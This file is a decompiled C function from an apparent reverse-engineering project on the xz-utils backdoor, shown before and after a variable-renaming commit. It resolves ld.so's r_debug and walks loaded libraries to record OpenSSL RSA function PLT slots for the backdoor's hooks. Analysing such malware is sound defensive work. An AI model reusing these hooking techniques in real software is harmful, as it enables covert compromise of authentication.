xzregh/104A40_process_shared_libraries.c
// /home/kali/xzre-ghidra/xzregh/104A40_process_shared_libraries.c
// Function: process_shared_libraries @ 0x104A40
// Calling convention: __stdcall
// Prototype: BOOL __stdcall process_shared_libraries(backdoor_shared_libraries_data_t * data)


/*
 * AutoDoc: Wrapper around `process_shared_libraries_map` that first resolves `r_debug` out of ld.so, copies the caller-provided struct into
 * a local scratch copy, and feeds the scratch copy into the map-walker. On success it propagates the filled-in handles (and libc
 * import table) back to the caller so later stages never have to read `r_debug` again.
 */

#include "xzre_types.h"

BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data)

{
  BOOL success;
  Elf64_Sym *r_debug_symbol;
  uchar *r_debug_addr;
  backdoor_shared_libraries_data_t tmp_state;
  Elf64_Sym *r_debug_sym;
  uchar *debug_block;
  void *local_30;
  void *local_28;
  void *local_20;
  backdoor_hooks_data_t **local_18;
  libc_imports_t *local_10;
  
  r_debug_symbol = elf_symbol_get(data->elf_handles->dynamic_linker,STR_r_debug,STR_GLIBC_2_2_5);
  success = FALSE;
  if (r_debug_symbol != (Elf64_Sym *)0x0) {
    debug_block = (uchar *)data->elf_handles;
    r_debug_addr = ((elf_handles_t *)debug_block)->dynamic_linker->elfbase->e_ident + r_debug_symbol->st_value;
    success = FALSE;
    if (0 < *(int *)r_debug_addr) {
      r_debug_sym = (Elf64_Sym *)data->data;
      local_30 = data->RSA_public_decrypt_plt;
      local_28 = data->EVP_PKEY_set1_RSA_plt;
      local_20 = data->RSA_get0_key_plt;
      local_18 = data->hooks_data_addr;
      local_10 = data->libc_imports;
      success = process_shared_libraries_map
                        (*(link_map **)(r_debug_addr + 8),(backdoor_shared_libraries_data_t *)&r_debug_sym
                        );
      success = (BOOL)(success != FALSE);
    }
  }
  return success;
}



- Updated variable names in `104370_find_dl_naudit.c` for clarity, changing generic names to more descriptive ones. - Simplified loop constructs and removed unnecessary variables in `104660_process_sh

xzregh/104A40_process_shared_libraries.c
// /home/kali/xzre-ghidra/xzregh/104A40_process_shared_libraries.c
// Function: process_shared_libraries @ 0x104A40
// Calling convention: __stdcall
// Prototype: BOOL __stdcall process_shared_libraries(backdoor_shared_libraries_data_t * data)


/*
 * AutoDoc: Wrapper around `process_shared_libraries_map` that first resolves `r_debug` out of ld.so, copies the caller-provided struct into
 * a local scratch copy, and feeds the scratch copy into the map-walker. On success it propagates the filled-in handles (and libc
 * import table) back to the caller so later stages never have to read `r_debug` again.
 */

#include "xzre_types.h"

BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data)

{
  BOOL success;
  Elf64_Sym *r_debug_symbol;
  uchar *r_debug_addr;
  backdoor_shared_libraries_data_t tmp_state;
  Elf64_Sym *r_debug_sym;
  uchar *debug_block;
  void *saved_RSA_public_decrypt_plt;
  void *saved_EVP_PKEY_set1_RSA_plt;
  void *saved_RSA_get0_key_plt;
  backdoor_hooks_data_t **saved_hooks_data_addr;
  libc_imports_t *saved_libc_imports;
  
  r_debug_symbol = elf_symbol_get(data->elf_handles->dynamic_linker,STR_r_debug,STR_GLIBC_2_2_5);
  success = FALSE;
  if (r_debug_symbol != (Elf64_Sym *)0x0) {
    debug_block = (uchar *)data->elf_handles;
    r_debug_addr = ((elf_handles_t *)debug_block)->dynamic_linker->elfbase->e_ident + r_debug_symbol->st_value;
    success = FALSE;
    if (0 < *(int *)r_debug_addr) {
      r_debug_sym = (Elf64_Sym *)data->data;
      saved_RSA_public_decrypt_plt = data->RSA_public_decrypt_plt;
      saved_EVP_PKEY_set1_RSA_plt = data->EVP_PKEY_set1_RSA_plt;
      saved_RSA_get0_key_plt = data->RSA_get0_key_plt;
      saved_hooks_data_addr = data->hooks_data_addr;
      saved_libc_imports = data->libc_imports;
      success = process_shared_libraries_map
                        (*(link_map **)(r_debug_addr + 8),(backdoor_shared_libraries_data_t *)&r_debug_sym
                        );
      success = (BOOL)(success != FALSE);
    }
  }
  return success;
}

